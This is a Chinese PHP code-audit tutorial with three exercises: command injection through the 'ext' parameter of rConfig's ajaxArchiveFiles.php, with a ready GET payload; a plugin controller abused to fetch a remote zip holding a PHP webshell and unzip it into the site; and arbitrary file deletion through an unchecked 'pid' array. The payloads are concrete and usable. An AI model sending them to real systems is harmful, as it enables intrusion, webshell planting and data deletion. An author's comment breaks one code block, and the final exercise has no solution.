PHP代码审计之实战审代码篇2

4. 仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

<?php
require_once("/home/rconfig/classes/usersession.class.php");
require_once("/home/rconfig/classes/ADLog.class.php");
require_once("/home/rconfig/config/functions.inc.php");
$log = ADLog::getInstance();
if (!$session->logged_in) {
    echo 'Don\'t bother trying to hack me!!!!!<br /> This hack attempt has been logged';
    $log->Warn("Security Issue: Some tried to access this file directly from IP: " . $_SERVER['REMOTE_ADDR'] . " & Username: " . $session->username . " (File: " . $_SERVER['PHP_SELF'] . ")");
    // need to add authentication to this script
    header("Location: " . $config_basedir . "login.php");
} else {
//archive logs files
    $mainPath = $_GET['path'];
    $archiveMainPath = $mainPath . "archive/";
    $ext = "*." . $_GET['ext'];
    $fullpath = $mainPath . $ext;
// create and archive dir if not already created
    if (!is_dir($archiveMainPath)) {
        mkdir("$archiveMainPath");
    }
    $today = date("Ymd");
    $commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext;
    $ext 是拼接上去的 是可控传参 没有经过任何过滤
    exec($commandString);
    foreach (glob($fullpath) as $v) {
        unlink($v);
    }

    $fileCount = count(glob($mainPath . $ext));

    if ($fileCount > 0) {
        $response = json_encode(array(
            'failure' => true
        ));
    } else {
        $response = json_encode(array(
            'success' => true
        ));
    }
    echo $response;
}  // end session check

拼接造成命令注入了！
相关payload参考

GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=1&ext=;ls%3E../../pq.txt HTTP/1.1

5.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

/A/c/PluginsController.php

PHP 的 fopen() 函数可以用来打开远程文件

其中这个类可用用action参数去调用不同函数，例如以下

解题:
那我们可以发两个包，一个用来调用start-download 函数来下载一个远程的zip文件。当然这个地址是我们可控的，
action=start-download&filepath=msgphone&download_url=http://0.0.0.0/test/a.zip
第二个包就调用file-upzip函数，让它去解压含php马的zip文件，也正好解压到了网站下的A/exts ,我们去访问它
action=sfile-upzip&filepath=msgphone&download_url=

6.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

public function delall(){
        if(isset($_POST['send'])){
            if(validate::isNullString($_POST['pid'])) tool::layer_alert('没有选择任何图片!','?a=pic',7);
            $_fileDir=ROOT_PATH.'/uploads/';
            foreach($_POST['pid'] as $_value){
                $_filePath=$_fileDir.$_value;
                if(!unlink($_filePath)){
                    tool::layer_alert('图片删除失败,请设权限为777!','?a=pic',7);
                }else{
                    header('Location:?a=pic');
                }
            }

        }

    }

pid是我们可控的，而且之后是拼接到filepath的那这不就造成任意文件删除了吗！
解题